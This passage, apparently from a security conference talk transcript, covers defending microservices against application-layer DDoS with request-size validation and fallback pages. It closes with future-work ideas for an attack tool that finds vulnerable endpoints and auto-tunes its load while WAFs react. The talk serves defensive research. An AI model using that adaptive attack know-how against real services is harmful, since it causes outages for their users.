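    if len(ids) > MAX_ITEMS_PER_REQUEST:
        errors.append(f"too many ids: {len(ids)} > {MAX_ITEMS_PER_REQUEST}")

    rng = body.get("items", {})
    span = rng.get("to", 0) - rng.get("from", 0)
    if span > MAX_RANGE_SPAN:
        errors.append(f"range too large: {span} > {MAX_RANGE_SPAN}")

    return errors     # empty list means the request is within limits

# e.g. in the request handler:
#   problems = validate_request(request_json)
#   if problems:
#       return 413, {"errors": problems}   # refuse before fanning out to the middle tier
```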
And then finally, trigger a fallback experience. You can think of a fallback experience, once again, as: your service is super unhealthy, but maybe you can at least return some sort of generic experience to your customers, so they don't just get some XML 504 error back when the service is really unhealthy.

So there's some future work, some areas I think we could explore a little bit more. Automated identification of potentially vulnerable endpoints: I alluded to this a little bit — it's kind of a manual process for me at this point, but I imagine that with enough sampling, enough request sizing, and enough munging of the data, maybe we could find a way to identify those latent calls automatically. Then auto-tuning during an attack: as you can imagine, while you're conducting a large scale application DDoS attack, things are going to change — the WAF is going to kick in, services are going to go up and down. Really, we should be able to build that into the tool and let it automatically tune how much work, or how many requests, it's sending while the attack is running. And finally, I think there's a really interesting opportunity in testing common open source microservice frameworks, libraries, and gateways; I would imagine there's more to be explored in that space.

With that, I want to say thanks. We're going to be hanging out in the chill-out room after this session if you want to chat or grab the source code. Thanks.